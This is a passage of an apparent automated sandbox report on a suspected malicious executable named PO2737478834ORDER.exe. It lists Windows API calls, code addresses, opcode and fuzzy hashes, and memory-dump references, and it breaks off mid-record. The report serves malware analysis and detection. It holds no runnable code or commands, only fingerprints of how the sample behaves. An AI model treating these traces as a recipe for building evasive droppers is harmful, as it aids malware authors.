                                                        • Opcode ID: 1fe9c1000dbda7a9d39110f4f9bff940efbdf01e75595cec207c4de3ebb5c286
                                                        • Instruction ID: 30547d814f52c0c9fa729df1a4499858ceafdecff29ed48dfb424bf33c152dfa
                                                        • Opcode Fuzzy Hash: 1fe9c1000dbda7a9d39110f4f9bff940efbdf01e75595cec207c4de3ebb5c286
                                                        • Instruction Fuzzy Hash: 3401D131B242109BE7194B389E05B2A36A8E710315F51823AB951F65F1D778CC129B4C
                                                        APIs
                                                        • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                        • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentExpandStringslstrcmp
                                                        • String ID:
                                                        • API String ID: 1938659011-0
                                                        • Opcode ID: c5e15ec4f271e5b13605caadbedc15ef21d55bb8369321960378bd72e4424914
                                                        • Instruction ID: ff397c2963c910d93bdf4a4cfe89f2afa8e55b21d5e8b43483d61f18aedd96fa
                                                        • Opcode Fuzzy Hash: c5e15ec4f271e5b13605caadbedc15ef21d55bb8369321960378bd72e4424914
                                                        • Instruction Fuzzy Hash: 84F08231705201DBCB20DF769D04A9BBFE4EF91355B10803BE155F6190D6388502CA68
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,?,?,00403385,0000000B), ref: 004064DC
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004064F7
                                                          • Part of subcall function 0040645C: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406473
                                                          • Part of subcall function 0040645C: wsprintfA.USER32 ref: 004064AC
                                                          • Part of subcall function 0040645C: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064C0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                        • String ID:
                                                        • API String ID: 2547128583-0
                                                        • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                        • Instruction ID: b1d6ada99e6651afe610309d4c68ede8e1123b1e5f34d771ce11ce336b0a7369
                                                        • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                        • Instruction Fuzzy Hash: 1AE086326042116BD21067705E0893B72A89E84700302443EF946F2144DB39EC35A76D
                                                        APIs
                                                        • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\PO2737478834ORDER.exe,80000000,00000003), ref: 00405C5E
                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                        • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                        • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                        • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                        APIs
                                                        • GetFileAttributesA.KERNELBASE(?,?,0040584D,?,?,00000000,00405A30,?,?,?,?), ref: 00405C3A
                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C4E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                        • Instruction ID: 59cc3d86ab4e26752c0bcc3731729734fb3652f4f3e26a658c09c1975061a851
                                                        • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                        • Instruction Fuzzy Hash: B6D0A932004021ABC2002728AE0888BBB50DB00270702CA35FDA4A22B1DB300C969A98
                                                        APIs
                                                        • CreateDirectoryA.KERNELBASE(?,00000000,00403305,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00405731
                                                        • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 0040573F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        • String ID:
                                                        • API String ID: 1375471231-0
                                                        • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                        • Instruction ID: fe143fb7e2c59eb3603aebef79fe73c29c1fae3f16fa91b3bf8fea648d0a9a1d
                                                        • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                        • Instruction Fuzzy Hash: 61C04C30604505EFD7515B209E09B177A94AB50781F15443DA146E10A0DF388455ED2D
                                                        APIs
                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileStringWrite
                                                        • String ID:
                                                        • API String ID: 390214022-0
                                                        • Opcode ID: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                        • Instruction ID: a2264a5e3b04165b7de03e79847980bb6a424129cbe2f78830b73284cd35be0b
                                                        • Opcode Fuzzy Hash: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                        • Instruction Fuzzy Hash: F8E04831610114ABD7203EB14F8D97F31A9DB44304B34153FBA11761C6D9FC5C414279
                                                        APIs
                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,00403295,00000000,004138E0,00000020,004138E0,00000020,000000FF,00000004,00000000), ref: 00405D15
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                        • Instruction ID: 9463c3abe6280d084d74f54212381f1c7099d27a46d02ce49af031ea16a2316f
                                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                        • Instruction Fuzzy Hash: 8BE0E63251065DABEF105F55AC04AEB775CEF15350F008437F955E3150D671E8619BA4
                                                        APIs
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032C7,00000000,00000000,00403124,000000FF,00000004,00000000,00000000,00000000), ref: 00405CE6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                        • Instruction ID: 0f3a91911b7368544d0479776f9460b67210371169305fae4b72b28e49471388
                                                        • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                        • Instruction Fuzzy Hash: 56E0EC3221835EEBEF109E559C04EEB7B6CEB05360F044437FD5AE2150D671E861ABA4
                                                        APIs
                                                        • SendMessageA.USER32(000104C0,00000000,00000000,00000000), ref: 004041A3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 9a349a504fb0886c84c083efb4d5a0f9bf7be7ebc5d16bd7850478614cc17ce1
                                                        • Instruction ID: 08778a02c31aee6c5ab49ec4881ce5c4c543093ca08d36e97cfe9cc2b9e67ff3
                                                        • Opcode Fuzzy Hash: 9a349a504fb0886c84c083efb4d5a0f9bf7be7ebc5d16bd7850478614cc17ce1
                                                        • Instruction Fuzzy Hash: BCC04CB57446017FEA208B609D49F0677686750701F2544297250B60D0C6B8D460D61C
                                                        APIs
                                                        • SendMessageA.USER32(00000028,?,00000001,00403FAA), ref: 00404188
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 4b8775389032d73bb0cdc78c7cec40c6840668cae09c009f0c0f7bab9180220a
                                                        • Instruction ID: 12fa0bd368318515ea3e07217fdd1357908c491f7ba982cdf3d5e787ac9e46f9
                                                        • Opcode Fuzzy Hash: 4b8775389032d73bb0cdc78c7cec40c6840668cae09c009f0c0f7bab9180220a
                                                        • Instruction Fuzzy Hash: C5B09236284A00ABDE218B10DE09F457AA2E7A8742F028028B240240B0CAB200A1EB08
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 004032D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                        • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                        • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                        • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                        APIs
                                                        • KiUserCallbackDispatcher.NTDLL(?,00403F43), ref: 00404171
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: CallbackDispatcherUser
                                                        • String ID:
                                                        • API String ID: 2492992576-0
                                                        • Opcode ID: 36152b0dcf1d80259a477477ce8a6ba5700b6154f7d802f5e94468563093d619
                                                        • Instruction ID: f56e5b77852c123102009bf48c8e97640dd16861c460b72fc417a08543d31c29
                                                        • Opcode Fuzzy Hash: 36152b0dcf1d80259a477477ce8a6ba5700b6154f7d802f5e94468563093d619
                                                        • Instruction Fuzzy Hash: 5AA01132000000AFCA02AB80EF08C0ABBB2ABA8300B008838A280800328B322820EB08
                                                        APIs
                                                        • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 1b443bf0d727d57298d8857cd11a567a68dfce872be13232ccc9a2637e56550a
                                                        • Instruction ID: ccf032fc60ebbebe8df404728041cac6d4b3f067c56570227f7a4de3c3b7a55a
